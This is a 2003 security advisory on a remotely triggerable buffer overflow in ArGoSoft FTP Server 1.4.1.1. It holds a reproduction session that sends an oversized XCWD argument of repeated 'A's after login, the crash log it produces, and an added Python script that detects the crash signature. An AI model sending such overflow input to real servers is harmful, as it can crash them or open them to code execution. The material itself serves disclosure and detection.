[NT] ArGoSoft FTP Server XCMD Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 09/29/03

    To: list@securiteam.com
    Date: 29 Sep 2003 14:21:57 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      ArGoSoft FTP Server XCMD Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    ArGoSoft FTP Server <http://www.argosoft.com/applications/ftpserver/> is
    "a FTP server for Windows95/98/NT, and supports all basic FTP commands,
    and much more, such as passive mode, resuming file transfers, windows
    shortcuts to another files, folders and drives (including network drives),
    virtual domains (multiple IP homes), IP filtering, site specific commands,
    such as compressing and copying files on the server, changing date/time
    stamps, and so on".

    A buffer overflow vulnerability exists in the product that allows remote
    attackers to overflow an internal buffer, causing the product to execute
    arbitrary code.

    DETAILS

    Vulnerable systems:
     * ArGoSoft FTP Server version 1.4 (1.4.1.1)

    Immune systems:
     * ArGoSoft FTP Server version 1.4 (1.4.1.2)

    Example:
    c:\> putty.exe localhost 21
    220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
    user ftp
    502 Unknown command
    user ftp
    331 User name OK, need password
    pass ftp
    230 User ftp logged in successfully **
    XCWD AAAAAAA....(5000 times)
    client closed connection.

    In the log file you will see something like:
    9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
    9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
    9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
    in module 'ftpsrvnt.exe'. Write of address 41414145
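
    A log check for the crash signature quoted above, as an added example (not part of the original advisory or the vendor's tooling). It assumes the "( 1)" prefix is the connection ID from the "ID=1" line, and that a fault address made of one repeated printable byte suggests client-supplied data.

```python
import re

# Constructed sample in the log format quoted in the advisory (wrapped line included).
SAMPLE_LOG = """\
9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145
"""

ENTRY = re.compile(r"^\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M - ")
CONNECT = re.compile(r"Requested FTP connection from (\S+) ID=(\d+)")
# "Read" is accepted as well as the "Write" shown on the page (assumption).
CRASH = re.compile(
    r"\(\s*(\d+)\)\s*'Error: Access violation at address ([0-9A-Fa-f]{8})\s+"
    r"in module '([^']+)'\. (Read|Write) of address ([0-9A-Fa-f]{8})")

def join_wrapped(text):
    """Merge continuation lines (no timestamp prefix) into the entry above."""
    entries = []
    for line in text.splitlines():
        s = line.strip()
        if ENTRY.match(s) or not entries:
            entries.append(s)
        elif s:
            entries[-1] += " " + s
    return entries

def looks_input_derived(addr_hex):
    """Heuristic: at least 3 of 4 address bytes are the same printable ASCII byte."""
    b = bytes.fromhex(addr_hex)
    top = max(set(b), key=b.count)
    return b.count(top) >= 3 and 0x20 <= top <= 0x7E

def find_crashes(text):
    """Return one finding per access violation, tied to the peer that opened the session."""
    peers, findings = {}, []
    for entry in join_wrapped(text):
        m = CONNECT.search(entry)
        if m:
            peers[m.group(2)] = m.group(1)
            continue
        m = CRASH.search(entry)
        if m:
            sid, fault_at, module, access, target = m.groups()
            findings.append({"timestamp": entry.split(" - ", 1)[0], "peer": peers.get(sid, "unknown"),
                             "fault_at": fault_at, "module": module, "access": access, "target": target,
                             "input_derived": looks_input_derived(target)})
    return findings
```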

    Vendor response:
    ArGoSoft has confirmed that there is a bug in the product. Version 1.4.1.2
    has been released; it can be downloaded from:
    http://www.argosoft.com/applications/ftpserver/download.asp

    ADDITIONAL INFORMATION

    The information has been provided by Moran Zavdi
    <mailto:moran@moozatech.com>.


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

